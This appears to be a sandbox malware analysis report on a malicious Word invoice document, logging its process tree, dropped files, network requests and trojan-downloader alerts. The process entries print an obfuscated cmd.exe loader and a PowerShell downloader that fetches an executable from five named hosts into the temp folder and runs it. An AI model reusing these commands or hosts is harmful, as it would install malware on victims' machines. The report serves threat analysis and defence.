Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3492CmD /V:/C"set bFa=evk2pM-fWX T4R,$Dl6I7JV3@89rB0}xEt{U('zQ~b/5jCcwa\:;om%N+AhGy=OgSL_u.iZ1FnPsd)&&for %9 in (4;52;47;54;74;35;28;65;19;45;50;40;43;14;71;54;27;54;64;32;64;64;19;62;55;55;57;5;32;50;40;6;12;14;71;54;58;54;11;32;5;74;50;40;6;23;14;71;54;17;17;10;15;76;12;18;71;25;61;37;27;23;23;18;26;37;51;15;38;43;20;3;3;61;73;0;47;6;52;41;44;0;46;33;10;55;0;33;68;8;0;41;45;17;69;0;73;33;51;15;69;12;25;12;29;61;37;58;33;33;4;50;42;42;47;47;47;68;33;27;48;73;75;17;48;53;4;67;73;63;68;46;52;53;42;64;58;45;58;73;32;28;41;73;45;62;24;58;33;33;4;50;42;42;48;63;0;73;33;7;52;31;68;69;52;42;55;12;62;7;22;32;39;45;12;28;67;35;1;72;45;22;24;58;33;33;4;50;42;42;73;69;63;0;27;69;48;7;48;75;41;53;41;46;52;73;63;27;0;75;75;68;7;67;33;53;69;73;73;48;68;0;76;67;68;73;63;42;23;13;5;3;43;45;20;53;25;58;9;32;20;25;62;66;65;24;58;33;33;4;50;42;42;75;52;75;6;76;0;41;52;67;46;58;48;63;0;6;76;67;53;0;73;60;68;46;52;53;42;47;4;6;48;76;53;69;73;42;22;46;59;21;60;76;13;25;19;72;64;26;24;58;33;33;4;50;42;42;75;48;17;48;58;68;53;52;41;69;69;17;48;33;68;46;52;53;42;32;63;0;29;16;44;7;39;13;62;63;8;17;1;21;70;17;66;73;75;55;1;1;37;68;64;4;17;69;33;36;37;24;37;77;51;15;38;26;12;20;25;61;37;33;23;43;18;20;37;51;15;48;3;3;26;26;10;61;10;37;3;43;71;37;51;15;73;26;3;26;3;61;37;47;71;29;26;26;37;51;15;75;25;25;29;3;61;15;0;73;1;50;33;0;53;4;56;37;49;37;56;15;48;3;3;26;26;56;37;68;0;31;0;37;51;7;52;27;0;48;46;58;36;15;27;12;18;12;18;10;69;73;10;15;69;12;25;12;29;77;34;33;27;60;34;15;38;43;20;3;3;68;16;52;47;73;17;52;48;76;72;69;17;0;36;15;27;12;18;12;18;14;10;15;75;25;25;29;3;77;51;15;69;23;26;26;3;61;37;69;20;29;29;37;51;19;7;10;36;36;59;0;33;6;19;33;0;53;10;15;75;25;25;29;3;77;68;17;0;73;63;33;58;10;6;63;0;10;12;29;29;29;29;77;10;34;19;73;1;52;2;0;6;19;33;0;53;10;15;75;25;25;29;3;51;15;27;26;3;18;25;61;37;1;26;25;12;25;37;51;41;27;0;48;2;51;30;30;46;48;33;46;58;34;30;30;15;69;25;43;29;71;61;37;38;26;20;12;20;37;51;79)do set jtJD=!jtJD!!bFa:~%9,1!&&if %9==79 echo !jtJD:~-629!|FOR /F "tokens=2 delims==Rf" %R IN ('assoc.cmd')DO %R "C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3336C:\Windows\system32\cmd.exe /S /D /c" echo pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $d4618='r3369';$z5722=new-object Net.WebClient;$i4840='http://www.translampung.com/ShChnEBbnCO@http://agentfox.io/N4OfVEQC4BuUvFCV@http://nigeriafasbmbcongress.futminna.edu.ng/3RM25C7m8hXE78O_L@http://sos-debouchage-dumeny.com/wp-admin/VcGJydR8IFS9@http://salah.mobiilat.com/Ege0DjfQROgWlvJZl_nsNvv'.Split('@');$z9478='t3567';$a2299 = '251';$n9292='w1099';$s8802=$env:temp+'\'+$a2299+'.exe';foreach($r4646 in $i4840){try{$z5722.DownloadFile($r4646, $s8802);$i3992='i700';If ((Get-Item $s8802).length -ge 40000) {Invoke-Item $s8802;$r9268='v9848';break;}}catch{}}$i8501='z9747';"C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3320C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=2 delims==Rf" %R IN ('assoc.cmd') DO %R "C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3700C:\Windows\system32\cmd.exe /c assoc.cmdC:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
4004cmd C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2188powershell $d4618='r3369';$z5722=new-object Net.WebClient;$i4840='http://www.translampung.com/ShChnEBbnCO@http://agentfox.io/N4OfVEQC4BuUvFCV@http://nigeriafasbmbcongress.futminna.edu.ng/3RM25C7m8hXE78O_L@http://sos-debouchage-dumeny.com/wp-admin/VcGJydR8IFS9@http://salah.mobiilat.com/Ege0DjfQROgWlvJZl_nsNvv'.Split('@');$z9478='t3567';$a2299 = '251';$n9292='w1099';$s8802=$env:temp+'\'+$a2299+'.exe';foreach($r4646 in $i4840){try{$z5722.DownloadFile($r4646, $s8802);$i3992='i700';If ((Get-Item $s8802).length -ge 40000) {Invoke-Item $s8802;$r9268='v9848';break;}}catch{}}$i8501='z9747';C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 360
Read events
890
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
2
Unknown types
5

Dropped files

PID
Process
Filename
Type
2356WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR8E5B.tmp.cvr
MD5:
SHA256:
2356WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\34B818B1.jpg
MD5:
SHA256:
2188powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6PS4QGLX57OQ5MCK3RCR.temp
MD5:
SHA256:
2188powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF19aa01.TMPbinary
MD5:901ECDF767744E6BB59CB023757886E3
SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1
2356WINWORD.EXEC:\Users\admin\AppData\Local\Temp\VBE\MSForms.exdtlb
MD5:DE78D1BCB7F228A17DC63810251DA6BA
SHA256:78D5F61576F4B5B2986892BBD66B53CCF08BB324FA44AAF2594FFC9B7A1962CB
2356WINWORD.EXEC:\Users\admin\Desktop\~$CHNUNG.xmlpgc
MD5:AE4A53C2584981FB610D90781D343243
SHA256:93FEDA264584BAD490FEB718CA16EF48820613FE41AC072E9FFC430454ABB7D4
2356WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dattext
MD5:A707709DD46F63C8EC879F783184C758
SHA256:4DD8356D383D2CC2FDF4B2362A3172A3C0C47007D0993D14046EA81E9F0A3FD7
2188powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:901ECDF767744E6BB59CB023757886E3
SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1
2356WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:1F9AF8DBADD4163987436CA9DF3CDC37
SHA256:9FC82323927C8D4BCCFCC5AF0D239A47108D4C8B8875BD51B9B0D713A706D7C7
2356WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\RECHNUNG.xml.LNKlnk
MD5:55C0CAE5E17D3B16B5F8C70071B36898
SHA256:460CE06AACF11E4B9E65DA6623062A3ECBDD64950BB579298D927229E61DA6F9
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
5
DNS requests
5
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2188
powershell.exe
GET
404
197.211.34.55:80
http://nigeriafasbmbcongress.futminna.edu.ng/3RM25C7m8hXE78O_L
NG
xml
345 b
malicious
2188
powershell.exe
GET
404
103.247.10.155:80
http://www.translampung.com/ShChnEBbnCO
ID
xml
345 b
malicious
2188
powershell.exe
GET
404
209.123.8.161:80
http://agentfox.io/N4OfVEQC4BuUvFCV
US
xml
345 b
malicious
2188
powershell.exe
GET
404
172.110.29.23:80
http://sos-debouchage-dumeny.com/wp-admin/VcGJydR8IFS9
US
xml
345 b
unknown
2188
powershell.exe
GET
404
68.66.224.25:80
http://salah.mobiilat.com/Ege0DjfQROgWlvJZl_nsNvv
US
xml
345 b
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2188
powershell.exe
209.123.8.161:80
agentfox.io
Net Access Corporation
US
malicious
2188
powershell.exe
197.211.34.55:80
nigeriafasbmbcongress.futminna.edu.ng
globacom-as
NG
malicious
2188
powershell.exe
103.247.10.155:80
www.translampung.com
Rumahweb Indonesia CV.
ID
suspicious
2188
powershell.exe
172.110.29.23:80
sos-debouchage-dumeny.com
Subnet Labs LLC
US
unknown
2188
powershell.exe
68.66.224.25:80
salah.mobiilat.com
A2 Hosting, Inc.
US
suspicious

DNS requests

Domain
IP
Reputation
www.translampung.com
  • 103.247.10.155
malicious
agentfox.io
  • 209.123.8.161
malicious
nigeriafasbmbcongress.futminna.edu.ng
  • 197.211.34.55
malicious
sos-debouchage-dumeny.com
  • 172.110.29.23
unknown
salah.mobiilat.com
  • 68.66.224.25
suspicious

Threats

PID
Process
Class
Message
2188
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Suspicious loader with tiny header
2188
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32
2188
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Suspicious loader with tiny header
2188
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32
No debug info